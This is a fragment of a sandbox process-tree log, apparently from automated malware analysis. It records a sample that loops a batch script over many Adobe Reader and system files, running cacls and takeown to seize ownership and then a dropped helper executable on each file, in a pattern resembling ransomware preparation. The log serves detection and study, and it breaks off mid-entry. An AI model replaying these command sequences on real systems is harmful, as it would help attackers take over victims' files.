C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMANIAN.TXT" /E /G Admin:F /C3⤵PID:2028
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMANIAN.TXT"3⤵
- Modifies file permissions
PID:1300
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c eSOQugH2.exe -accepteula "ROMANIAN.TXT" -nobanner3⤵
- Loads dropped DLL
PID:1788 -
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula "ROMANIAN.TXT" -nobanner4⤵
- Executes dropped EXE
PID:204
-
-
-
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1912
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\hGnPMHgo.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1258.TXT""2⤵
- Loads dropped DLL
PID:2024 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1258.TXT" /E /G Admin:F /C3⤵PID:940
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1258.TXT"3⤵
- Modifies file permissions
PID:2012
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c eSOQugH2.exe -accepteula "CP1258.TXT" -nobanner3⤵
- Loads dropped DLL
PID:320 -
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula "CP1258.TXT" -nobanner4⤵
- Executes dropped EXE
PID:2000
-
-
-
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1728
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\hGnPMHgo.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf""2⤵
- Loads dropped DLL
PID:1536 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf" /E /G Admin:F /C3⤵PID:876
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf"3⤵
- Modifies file permissions
PID:436
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c eSOQugH2.exe -accepteula "AdobeID.pdf" -nobanner3⤵
- Loads dropped DLL
PID:228 -
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula "AdobeID.pdf" -nobanner4⤵
- Executes dropped EXE
PID:1764
-
-
-
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1268
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\hGnPMHgo.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf""2⤵
- Loads dropped DLL
PID:576 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf" /E /G Admin:F /C3⤵PID:1492
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf"3⤵
- Modifies file permissions
PID:236
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c eSOQugH2.exe -accepteula "DefaultID.pdf" -nobanner3⤵
- Loads dropped DLL
PID:396 -
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula "DefaultID.pdf" -nobanner4⤵
- Executes dropped EXE
PID:936
-
-
-
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:2012
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\hGnPMHgo.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png""2⤵
- Loads dropped DLL
PID:1448 -
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png" /E /G Admin:F /C3⤵PID:1116
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1192
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c eSOQugH2.exe -accepteula "device.png" -nobanner3⤵
- Loads dropped DLL
PID:1992 -
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula "device.png" -nobanner4⤵
- Executes dropped EXE
PID:1764
-
-
-
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:216
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\hGnPMHgo.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml""2⤵
- Loads dropped DLL
PID:220 -
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml" /E /G Admin:F /C3⤵PID:1344
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1496
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c eSOQugH2.exe -accepteula "tasks.xml" -nobanner3⤵
- Loads dropped DLL
PID:940 -
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula "tasks.xml" -nobanner4⤵
- Executes dropped EXE
PID:936
-
-
-
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:2012
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\hGnPMHgo.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\license.html""2⤵
- Loads dropped DLL
PID:1876 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\license.html" /E /G Admin:F /C3⤵PID:632
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\license.html"3⤵PID:676
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c eSOQugH2.exe -accepteula "license.html" -nobanner3⤵
- Loads dropped DLL
PID:1108 -
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula "license.html" -nobanner4⤵
- Executes dropped EXE
PID:1828
-
-
-
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:912
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\hGnPMHgo.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\add_reviewer.gif""2⤵
- Loads dropped DLL
PID:1364 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\add_reviewer.gif" /E /G Admin:F /C3⤵PID:1116
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\add_reviewer.gif"3⤵PID:564
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c eSOQugH2.exe -accepteula "add_reviewer.gif" -nobanner3⤵
- Loads dropped DLL
PID:848 -
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula "add_reviewer.gif" -nobanner4⤵
- Executes dropped EXE
PID:1356
-
-
-
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:656
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\hGnPMHgo.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_received.gif""2⤵
- Loads dropped DLL
PID:1576 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_received.gif" /E /G Admin:F /C3⤵PID:1456
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_received.gif"3⤵
- Modifies file permissions
PID:232
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c eSOQugH2.exe -accepteula "forms_received.gif" -nobanner3⤵
- Loads dropped DLL
PID:1864 -
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula "forms_received.gif" -nobanner4⤵
- Executes dropped EXE
PID:936
-
-
-
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:576
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\hGnPMHgo.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_super.gif""2⤵
- Loads dropped DLL
PID:220 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_super.gif" /E /G Admin:F /C3⤵PID:1016
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_super.gif"3⤵
- Modifies file permissions
PID:320
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c eSOQugH2.exe -accepteula "reviews_super.gif" -nobanner3⤵
- Loads dropped DLL
PID:1628 -
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula "reviews_super.gif" -nobanner4⤵
- Executes dropped EXE
PID:1728
-
-
-
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:112
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\hGnPMHgo.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\submission_history.gif""2⤵
- Loads dropped DLL
PID:1952 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\submission_history.gif" /E /G Admin:F /C3⤵PID:308
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\submission_history.gif"3⤵
- Modifies file permissions
PID:436
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c eSOQugH2.exe -accepteula "submission_history.gif" -nobanner3⤵
- Loads dropped DLL
PID:564 -
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula "submission_history.gif" -nobanner4⤵
- Executes dropped EXE
PID:1568
-
-
-
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:848
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\hGnPMHgo.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-H""2⤵
- Loads dropped DLL
PID:288 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-H" /E /G Admin:F /C3⤵PID:1448
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-H"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1456
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c eSOQugH2.exe -accepteula "Identity-H" -nobanner3⤵
- Loads dropped DLL
PID:1844 -
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula "Identity-H" -nobanner4⤵
- Executes dropped EXE
PID:920
-
-
-
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1308
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\hGnPMHgo.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Regular.otf""2⤵
- Loads dropped DLL
PID:1492 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Regular.otf" /E /G Admin:F /C3⤵PID:632
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Regular.otf"3⤵PID:676
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c eSOQugH2.exe -accepteula "MinionPro-Regular.otf" -nobanner3⤵
- Loads dropped DLL
PID:1348 -
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula "MinionPro-Regular.otf" -nobanner4⤵
- Executes dropped EXE
PID:556
-
-
-
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1252
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\hGnPMHgo.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZY______.PFB""2⤵
- Loads dropped DLL
PID:1788 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZY______.PFB" /E /G Admin:F /C3⤵PID:1116
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZY______.PFB"3⤵
- Modifies file permissions
PID:436
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c eSOQugH2.exe -accepteula "ZY______.PFB" -nobanner3⤵
- Loads dropped DLL
PID:1992 -
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula "ZY______.PFB" -nobanner4⤵
- Executes dropped EXE
PID:1568
-
-
-
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:216
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\hGnPMHgo.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt32.clx""2⤵
- Loads dropped DLL
PID:1876 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt32.clx" /E /G Admin:F /C3⤵PID:992
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt32.clx"3⤵
- Modifies file permissions
PID:1672
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c eSOQugH2.exe -accepteula "brt32.clx" -nobanner3⤵
- Loads dropped DLL
PID:1456 -
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula "brt32.clx" -nobanner4⤵
- Executes dropped EXE
PID:396
-
-
-
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:940
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\hGnPMHgo.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa.fca""2⤵PID:1308
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa.fca" /E /G Admin:F /C3⤵PID:1576
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa.fca"3⤵
- Modifies file permissions
PID:1900
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c eSOQugH2.exe -accepteula "usa.fca" -nobanner3⤵PID:676
-
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula "usa.fca" -nobanner4⤵
- Executes dropped EXE
PID:1744
-
-
-
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1728
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\hGnPMHgo.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CROATIAN.TXT""2⤵PID:1392
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CROATIAN.TXT" /E /G Admin:F /C3⤵PID:760
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CROATIAN.TXT"3⤵
- Modifies file permissions
PID:228
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c eSOQugH2.exe -accepteula "CROATIAN.TXT" -nobanner3⤵PID:1268
-
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula "CROATIAN.TXT" -nobanner4⤵PID:1300
-
-
-
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1568
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\hGnPMHgo.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1251.TXT""2⤵PID:216
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1251.TXT" /E /G Admin:F /C3⤵PID:876
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1251.TXT"3⤵
- Modifies file permissions
PID:1496
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c eSOQugH2.exe -accepteula "CP1251.TXT" -nobanner3⤵PID:1216
-
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula "CP1251.TXT" -nobanner4⤵PID:1236
-
-
-
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:396
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\hGnPMHgo.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\adobepdf.xdc""2⤵PID:1912
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\adobepdf.xdc" /E /G Admin:F /C3⤵PID:1916
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\adobepdf.xdc"3⤵
- Modifies file permissions
PID:204
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c eSOQugH2.exe -accepteula "adobepdf.xdc" -nobanner3⤵PID:320
-
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula "adobepdf.xdc" -nobanner4⤵PID:2000
-
-
-
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1744
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\hGnPMHgo.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf""2⤵PID:1892
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf" /E /G Admin:F /C3⤵PID:112
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf"3⤵
- Modifies file permissions
PID:308
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c eSOQugH2.exe -accepteula "ENUtxt.pdf" -nobanner3⤵PID:1116
-
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula "ENUtxt.pdf" -nobanner4⤵PID:436
-
-
-
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1300
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\hGnPMHgo.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\distribute_form.gif""2⤵PID:656
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\distribute_form.gif" /E /G Admin:F /C3⤵PID:1224
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\distribute_form.gif"3⤵
- Modifies file permissions
PID:1448
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c eSOQugH2.exe -accepteula "distribute_form.gif" -nobanner3⤵PID:992
-
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula "distribute_form.gif" -nobanner4⤵PID:1672
-
-
-
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1236
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\hGnPMHgo.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\main.css""2⤵PID:668
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\main.css" /E /G Admin:F /C3⤵PID:1968
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\main.css"3⤵
- Modifies file permissions
PID:2004
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c eSOQugH2.exe -accepteula "main.css" -nobanner3⤵PID:1576
-
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula "main.css" -nobanner4⤵PID:1900
-
-
-
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2000
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\hGnPMHgo.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_shared.gif""2⤵PID:608
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_shared.gif" /E /G Admin:F /C3⤵PID:1344
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_shared.gif"3⤵
- Modifies file permissions
PID:1252
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c eSOQugH2.exe -accepteula "review_shared.gif" -nobanner3⤵PID:760
-
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula "review_shared.gif" -nobanner4⤵PID:228
-
-
-
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:436
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\hGnPMHgo.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInAcrobat.gif""2⤵PID:616
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInAcrobat.gif" /E /G Admin:F /C3⤵PID:1340
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInAcrobat.gif"3⤵PID:1364
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c eSOQugH2.exe -accepteula "turnOffNotificationInAcrobat.gif" -nobanner3⤵PID:876
-
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula "turnOffNotificationInAcrobat.gif" -nobanner4⤵PID:1496
-
-
-
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1672
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\hGnPMHgo.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-BoldOblique.otf""2⤵PID:1536
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-BoldOblique.otf" /E /G Admin:F /C3⤵PID:536
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-BoldOblique.otf"3⤵
- Modifies file permissions
PID:288
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c eSOQugH2.exe -accepteula "CourierStd-BoldOblique.otf" -nobanner3⤵PID:1916
-
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula "CourierStd-BoldOblique.otf" -nobanner4⤵PID:204
-
-
-
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1900
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\hGnPMHgo.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Regular.otf""2⤵PID:1788
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Regular.otf" /E /G Admin:F /C3⤵PID:1844
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Regular.otf"3⤵PID:576
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c eSOQugH2.exe -accepteula "MyriadPro-Regular.otf" -nobanner3⤵PID:1068
-
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula "MyriadPro-Regular.otf" -nobanner4⤵PID:1764
-
-
-
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:832
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\hGnPMHgo.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB_EURO.txt""2⤵PID:2028
-
